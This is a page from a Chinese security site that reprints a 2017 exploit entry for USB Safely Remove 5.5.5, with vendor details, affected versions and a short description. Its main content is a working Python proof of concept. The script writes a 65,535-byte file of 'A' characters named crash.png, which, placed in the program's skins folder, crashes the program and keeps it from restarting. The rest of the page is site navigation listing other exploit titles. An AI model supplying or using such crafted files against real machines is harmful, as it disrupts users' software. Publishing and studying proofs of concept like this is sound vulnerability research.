首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
USB Safely Remove 5.5.5 Denial Of Service
来源:https://thel3l.me 作者:Jayasimha 发布时间:2017-09-05  
#!/usr/bin/python

# Exploit Title: USB Safely Remove 5.5.5 - Denial of Service
# Date of Discovery: August 31 2017
# Exploit Author: Rithwik Jayasimha
# Author Homepage/Contact: https://thel3l.me
# Vendor Name: Crystal Rich Ltd.
# Vendor Homepage: https://safelyremove.com
# Software Link: https://safelyremove.com/startdownload.htm?v=5.5
# Affected Versions: <=5.5.5.1250
# Tested on: Windows 7
# Category: local
# Vulnerability type: Denial of Service

# Description
'''    USB Safely Remove versions < 5.5.5 crash when a skin containing a malformed png image is usedself.
    The skins can be found under <program path>/skins and if the user is sent a skin containing a malformed skin,
    the program crashes. Additionally, it will refuse to start again (beacause it keeps crashing until the directory
    containing the installed skin is removed.)'''
# 0012EF68  41 41 41 41 41 41 41 41                          AAAAAAAA

# Generate a .png file using the python script and replace any of the default skin images.

file = "crash.png"

buffer = "A" * 65535

f = open(file, "w")
f.write(buffer)
f.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Notes 8.5.x/9.0.x - Denial
·libgedit.a 3.22.1 Denial Of Se
·IBM Notes 8.5.x/9.0.x - Denial
·Malicious Git HTTP Server For
·Dup Scout Enterprise 9.9.14 -
·VX Search Enterprise 10.0.14 B
·NEC EXPRESS CLUSTER clpwebmc R
·Easy Vedio to PSP Converter 1.
·Mongoose Web Server 6.5 - Cros
·QNAP Transcode Server Command
·Jungo DriverWizard WinDriver -
·Easy RM RMVB To DVD Burner 1.8
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved